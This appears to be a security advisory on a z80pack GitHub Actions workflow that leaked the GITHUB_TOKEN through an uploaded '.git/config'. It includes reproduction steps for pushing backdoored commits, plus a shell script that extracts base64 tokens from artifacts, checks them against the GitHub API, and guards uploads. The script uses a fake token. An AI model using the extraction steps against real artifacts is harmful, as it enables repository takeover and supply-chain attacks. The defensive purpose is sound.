z80pack GitHub Actions Workflow GITHUB_TOKEN Exposure Vulnerability

Vulnerability

A vulnerability exists in the z80pack GitHub repository's GitHub Actions workflow file 'makefile-ubuntu.yml' in all versions prior to the fix. The workflow checks out the repository and then uploads an artifact that includes the '.git/config' file. actions/checkout persists the job's GITHUB_TOKEN in that file by default (as an HTTP 'extraheader' value carrying the token in base64), so anyone able to download the artifact (for a public repository, any logged-in GitHub user) can recover the token and use it against the GitHub API, potentially pushing malicious code or altering release commits in the repository.

Impact

Exploitation of this vulnerability allows unauthorized use of the GITHUB_TOKEN with whatever permissions the workflow granted it, enabling an attacker to inject malicious code into the repository or manipulate release commits. The result is a supply-chain compromise: users who build from the repository or fetch a release would receive code the maintainers never wrote.

Reproduction

To reproduce this vulnerability, trigger a workflow run that uses the 'makefile-ubuntu.yml' file. Once the artifact is available for download, unpack it and extract the GITHUB_TOKEN from the '.git/config' file it contains. The token can then be used with the GitHub API to push a backdoored commit to the repository's master branch or to update release tags to point to the compromised commit. Two conditions bound the attack: a GITHUB_TOKEN is revoked as soon as the job that minted it finishes (and after 24 hours at most), so the artifact must be downloaded and the token used while that job is still running; and the token can only do what the workflow's 'permissions' (or the repository's default token permissions) allow, so pushing requires write access to contents.

Remediation

The vulnerability has been addressed by modifying the 'makefile-ubuntu.yml' workflow so that the uploaded artifact no longer contains the '.git/config' file. Anyone who forked or copied the workflow should update to the current version. Two further hardening steps are worth applying alongside the fix: set 'persist-credentials: false' on the actions/checkout step unless a later step needs the token to push, so the token is never written to '.git/config' in the first place; and restrict the 'path' given to actions/upload-artifact to the build outputs (or exclude the '.git' directory with a '!' pattern) rather than the whole working tree, so a future workflow change cannot reintroduce the leak.
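The following shell script is an added example written for this page; it is not z80pack code and not the project's workflow. It covers both the Reproduction and the Remediation sections: 'extract_token' recovers a token from a '.git/config' in the layout actions/checkout writes (an 'extraheader' holding base64 of 'x-access-token:<token>'), 'scan_artifact' walks an unpacked artifact for such files, and 'assert_artifact_clean' is the pre-upload guard a workflow can run before actions/upload-artifact. The token, file names and repository name are constructed placeholders; 'token_is_live' makes a network call and is defined but not exercised by the demo at the bottom.

```shell
#!/bin/sh
# Added example, not part of z80pack or its workflow.
set -eu

# actions/checkout (persist-credentials: true, the default) writes into .git/config:
#   [http "https://github.com/"]
#       extraheader = AUTHORIZATION: basic base64("x-access-token:<token>")
# extract_token prints the bare token from such a file, or fails if none is present.
extract_token() {
    b64=$(sed -n 's/^[[:space:]]*extraheader[[:space:]]*=[[:space:]]*AUTHORIZATION: basic //p' "$1" | head -n 1)
    [ -n "$b64" ] || return 1
    printf '%s' "$b64" | base64 -d | sed 's/^x-access-token://'
}

# Walk an unpacked artifact and print "<config path>\t<token>" for every hit.
scan_artifact() {
    find "$1" -type f -path '*/.git/config' 2>/dev/null | while read -r cfg; do
        tok=$(extract_token "$cfg") && printf '%s\t%s\n' "$cfg" "$tok"
    done
}

# A GITHUB_TOKEN is revoked when its job finishes (24 h at most), so check
# liveness first. Prints the HTTP status: 200 while live, 401 once revoked.
# Usage: token_is_live owner/repo "$token"   (network call; not run below)
token_is_live() {
    curl -s -o /dev/null -w '%{http_code}' \
        -H "Authorization: Bearer $2" "https://api.github.com/repos/$1"
}

# Pre-upload guard: refuse to ship a staging directory that still contains a
# .git directory or any file carrying a basic AUTHORIZATION header.
# Run it as a workflow step on the directory you hand to actions/upload-artifact.
assert_artifact_clean() {
    if [ -n "$(find "$1" -type d -name .git)" ]; then
        echo "refusing to upload: $1 contains a .git directory" >&2
        return 1
    fi
    if grep -qr 'AUTHORIZATION: basic' "$1" 2>/dev/null; then
        echo "refusing to upload: credential header found under $1" >&2
        return 1
    fi
    return 0
}

# Constructed sample: a fake token laid out exactly as actions/checkout would
# persist it, next to a stand-in build output. Not a real credential.
FAKE_TOKEN='ghs_ExampleFakeTokenForDemoOnly0000000000'
make_sample_checkout() {
    mkdir -p "$1/.git"
    auth=$(printf 'x-access-token:%s' "$FAKE_TOKEN" | base64 | tr -d '\n')
    printf '[core]\n\trepositoryformatversion = 0\n[http "https://github.com/"]\n\textraheader = AUTHORIZATION: basic %s\n' \
        "$auth" > "$1/.git/config"
    printf 'binary\n' > "$1/cpmsim"   # placeholder for the build output the workflow meant to ship
}

# Demo: a "leaky" artifact that packed the whole working tree, and a "clean"
# one that contains only the build output.
work=$(mktemp -d)
make_sample_checkout "$work/leaky"
mkdir -p "$work/clean" && cp "$work/leaky/cpmsim" "$work/clean/"

echo "tokens recovered from the leaky artifact:"
scan_artifact "$work/leaky"
assert_artifact_clean "$work/leaky" || echo "guard blocked the leaky artifact"
assert_artifact_clean "$work/clean" && echo "guard passed the clean artifact"
rm -rf "$work"
```

The guard deliberately checks for the header string as well as the '.git' directory: a workflow that copies '.git/config' somewhere else, or a tool that persists the same header into a different file, would still be caught.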

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 2.5
exploitability: 7.6
remediation: 0.0
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.